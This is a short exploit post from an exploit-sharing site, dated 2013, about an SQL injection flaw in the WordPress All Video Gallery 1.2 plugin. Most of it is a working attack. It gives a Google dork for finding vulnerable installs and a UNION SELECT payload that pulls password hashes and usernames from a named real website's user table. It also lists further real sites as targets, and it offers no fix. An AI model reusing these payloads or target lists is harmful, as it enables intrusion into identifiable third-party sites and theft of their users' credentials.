Wordpress All Video Gallery 1.2 SQL Injection

2013-09-06 23:14:18
Inviato da: JoKeR_StEx

=============================================
Exploit title : Wordpress All Video Gallery 1.2 SQL Injection Vulnerability
Author : JoKeR_StEx
Date : 04/09/2013
Tested on : WinXP sp3 , linux
Google Dork : inurl:"/wp-content/plugins/all-video-gallery/"
============================================================================================
Exploit :

http://www.site.com/path/wp-content/plugins/all-video-gallery/config.php?vid=8&pid=1[inj3ct Here]

/#/D3m0 :

http://www.casaprestige.ae/AR/wp-content/plugins/all-video-gallery/config.php?vid=-2/**/union/**/select/**/1,2,3,4,group_concat(user_pass,0x3a,user_login),6,7,8,9,10,11,12,13,14,15,16,17,18/**/from/**/wp_3_users--&pid=1

/#/D3m0 Websites :

=============================================================================================

http://www.casaprestige.ae/AR/wp-content/plugins/all-video-gallery/config.php?vid=2&pid=1

http://doanhnhanvietnamonline.com/wp-content/plugins/all-video-gallery/config.php?vid=3&pid=1

http://chopsticks.com.my/wp-content/plugins/all-video-gallery/config.php?vid=17&pid=1

=============================================================================================

Gr33t'z To : asesino04 , Team Dz S.O.S & all Algerian Hackers And Pentesters

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.